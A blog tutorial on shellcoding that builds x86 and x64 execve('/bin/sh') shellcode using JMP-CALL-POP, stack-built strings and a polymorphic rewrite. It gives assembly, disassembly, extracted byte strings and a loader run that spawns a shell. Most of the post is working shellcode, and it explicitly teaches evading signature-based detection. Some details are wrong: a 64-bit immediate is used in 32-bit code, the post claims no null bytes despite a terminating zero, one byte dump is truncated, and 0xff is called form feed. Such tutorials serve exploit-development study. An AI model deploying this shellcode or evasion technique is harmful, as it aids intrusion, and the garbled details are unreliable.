Post

18. Eliminating Bad Chars

18. Eliminating Bad Chars

Now in our journey of shellcoding we will try to eliminate bad chars which create nuisance and break our exploit.

Common Bad Characters:

  • 0x0A (newline) - breaks in input functions
  • 0x0D (carriage return) - breaks in network protocols
  • 0x00 (null) - string terminator
  • 0xff (form feed) - Sometimes used in serial communications

JMP-POP Technique

Although in the previous blog we have used this technique, in this section I’ll show you how to rewrite that code using JMP-CALL-POP and explain why it’s often preferred.

Here’s how you can rewrite your shellcode using the JMP-CALL-POP method:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
section .text
    global _start

_start:
    jmp short get_string   ; Jump to the get_string label

code:
    pop ebx               ; ebx now points to "/bin/sh" string
    xor eax, eax          ; Clear eax
    mov al, 11            ; execve syscall number
    xor ecx, ecx          ; argv = NULL
    xor edx, edx          ; envp = NULL  
    int 0x80              ; Invoke syscall

get_string:
    call code             ; This pushes the next address onto stack
    db '/bin/sh', 0       ; The string data

jmp short get_string will Jump to the get_string label. The call code does two things:

  • Pushes the address of the next instruction (where our string is) onto the stack
  • Jumps to the code label

The next instruction pop ebx pops the saved address (pointing to our string) into ebx. Now ebx points directly to “/bin/sh” and we can proceed with the syscall.

Let’s assemble and examine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ objdump -M intel -d jmp_pop_execve32

jmp_pop_execve32:     file format elf32-i386


Disassembly of section .text:

08049000 <_start>:
 8049000:	eb 0b                	jmp    804900d <get_string>

08049002 <code>:
 8049002:	5b                   	pop    ebx
 8049003:	31 c0                	xor    eax,eax
 8049005:	b0 0b                	mov    al,0xb
 8049007:	31 c9                	xor    ecx,ecx
 8049009:	31 d2                	xor    edx,edx
 804900b:	cd 80                	int    0x80

0804900d <get_string>:
 804900d:	e8 f0 ff ff ff       	call   8049002 <code>
 8049012:	2f                   	das    
 8049013:	62 69 6e             	bound  ebp,QWORD PTR [ecx+0x6e]
 8049016:	2f                   	das    
 8049017:	73 68                	jae    8049081 <get_string+0x74>

Now let’s check for null bytes:

1
2
3
$ ./shellcode_kit.sh  -a x86 --extract jmp_pop_execve32
$ cat shellcode_jmp_pop_execve32.txt 
\xeb\x0b\x5b\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

Beautiful, isn’t it? No null bytes, no hardcoded addresses.

And we can pass this to our loader -

1
2
3
4
5
6
7
8
9
./shellcode_kit.sh  -a x86 --run jmp_pop_execve32
Executing Shellcode
----------------------------------------
Shellcode Length: 25 bytes
Allocated executable memory at: 0xeea74000
Executing shellcode...
$ whoami
fury

Storing String on Stack

Sometimes we need to be even more creative. Instead of storing our string in the code section, we can build it directly on the stack:

x86 Version (32-bit)

1
2
3
4
5
6
7
8
9
10
11
12
13
section .text
    global _start

_start:
    ; execve("/bin/sh", NULL, NULL)
    xor ecx, ecx          ; Clear ecx (argv = NULL)
    mul ecx               ; Clear eax and edx (edx = envp = NULL)
    mov ebx, 0x68732f6e69622f2f ; "//bin/sh" in reverse
    push ecx              ; Push NULL
    push ebx              ; Push "/bin/sh" string
    mov ebx, esp          ; ebx points to "/bin/sh" string
    mov al, 11            ; execve syscall number
    int 0x80

x64 Version (64-bit)

1
2
3
4
5
6
7
8
9
10
11
12
13
section .text
    global _start

_start:
    ; execve("/bin/sh", NULL, NULL)
    xor rsi, rsi          ; Clear rsi (argv = NULL)
    mul rsi               ; Clear rax and rdx (rdx = envp = NULL)
    mov rdi, 0x68732f6e69622f2f ; "//bin/sh" in reverse (little-endian)
    push rsi              ; Push NULL
    push rdi              ; Push "/bin/sh" string
    mov rdi, rsp          ; rdi points to "/bin/sh" string
    mov al, 59            ; execve syscall number
    syscall

The Art of Polymorphism

In our execve x86 shellcode -

1
2
$ cat shellcode_execve32.txt 
\x31\xc9\xf7\xe1\xbb\x2f\x2f\x62\x69\x51\x53\x89\xe3\xb0\x0b\xcd\x80

Now let’s talk about real stealth: imagine our original shellcode gets detected because it contains \x31 bytes from the xor instruction. To avoid detection, we need to rewrite it without changing its function—this is polymorphism in action. By doing so, we create a polymorphic shellcode, where the core functionality remains the same, but the assembly instructions and resulting bytecode are altered, making it a fundamental technique for evading signature-based detection.

Let’s break down the original code and see where we can make substitutions.

Step 1: Clearing the Registers Differently

The original shellcode uses xor to zero out register ecx.

  • xor ecx, ecx = \x31\xc9

Our target is the \x31 byte. How else can we zero a register?

  • sub ecx, ecx (Subtract itself) - \x29\xc9
  • mov ecx, 0 (Move zero) - \xb9\x00\x00\x00\x00 (Not useful)
  • and ecx, 0 (Bitwise AND with zero) - \x83\xe1\x00 (Not useful)

Let’s go with sub ecx, ecx. It’s the same size and just as effective!

Step 2: Building the String on the Stack (Alternative Approach)

The original code moves the entire 8-byte string into ebx and then pushes it. The instruction mov ebx, 0x68732f6e69622f2f contains no “bad” bytes for us in this exercise, but it’s a very recognizable sequence. Let’s try a different, more stealthy approach: building the string using smaller values.

We can push the string "/bin/sh" onto the stack in two 4-byte chunks. Remember, the stack grows downward, and we need to account for null-termination and little-endian order.

We want to push //bin/sh (using two slashes to make it 8 bytes is a common trick). Let’s split it:

  • hs/n = 0x68732f6e
  • ib// = 0x69622f2f

But instead of using mov with these large, recognizable numbers, we can construct them using arithmetic operations. A common trick is to avoid 0x00 bytes (null terminators) and other common low bytes.

Here is our rewritten, polymorphic version of the shellcode. It avoids the \x31 byte and uses a different method to build the string.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
section .text
    global _start

_start:
    ; execve("/bin/sh", NULL, NULL) - Polymorphic Version

    ; Clear registers without using XOR
    sub ecx, ecx        ; ecx = 0 (argv = NULL). Replaces XOR.
    mov eax, ecx        ; eax = 0 (we'll set the syscall later)
    mov edx, ecx        ; edx = 0 (envp = NULL). Replaces MUL.

    ; Build the string "//bin/sh" on the stack creatively
    push ecx            ; Push NULL terminator (0x00000000)
    
    ; Push "//bin/sh" by using smaller moves and a shift
    ; Push "//sh" (0x68732f2f)
    mov esi, 0x57621e1e
    add esi, 0x11111111 ; 0x57621e1e + 0x11111111 = 0x68732f2f 
    push esi            ; Push first part ("hs//")

    ; Push "/bin" (0x6e69622f) 
    mov esi, 0x5d58511e
    add esi, 0x11111111 ; 0x5d58511e + 0x11111111 = 0x6e69622f 
    push esi            ; Push second part ("nib/")
    ; Stack now has "/bin//sh"

    mov ebx, esp        ; ebx points to our string

    ; Set up the syscall
    mov al, 11          ; execve syscall number
    int 0x80

If you try to dump shellcode and verify we don’t have any 0x31 now. Also we have encoded our string /bin//sh

1
2
3
$ cat shellcode_polymorphic_x86.txt 
\x29\xc9\x89\xc8\x89\xca\x51\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11\x56\xbe\x1e\x51\x58\x5d\x81\xc6\x11\x11\x11\x11\x56\x89\xe3\xb0\x0b\xcd\x80

No \x31 in sight! We’ve successfully disguised our shellcode while keeping the same functionality.

So what did we learn from all this? Well, in the world of hacking, it’s a constant game of cat and mouse. We figured out how to remove the bad 0x31 byte, but our new shellcode got bigger and more complicated. It’s a classic trade-off: to be more sneaky, you often have to be less efficient. There’s hardly ever just one right answer—just different tools for different jobs.

This post is licensed under CC BY 4.0 by the author.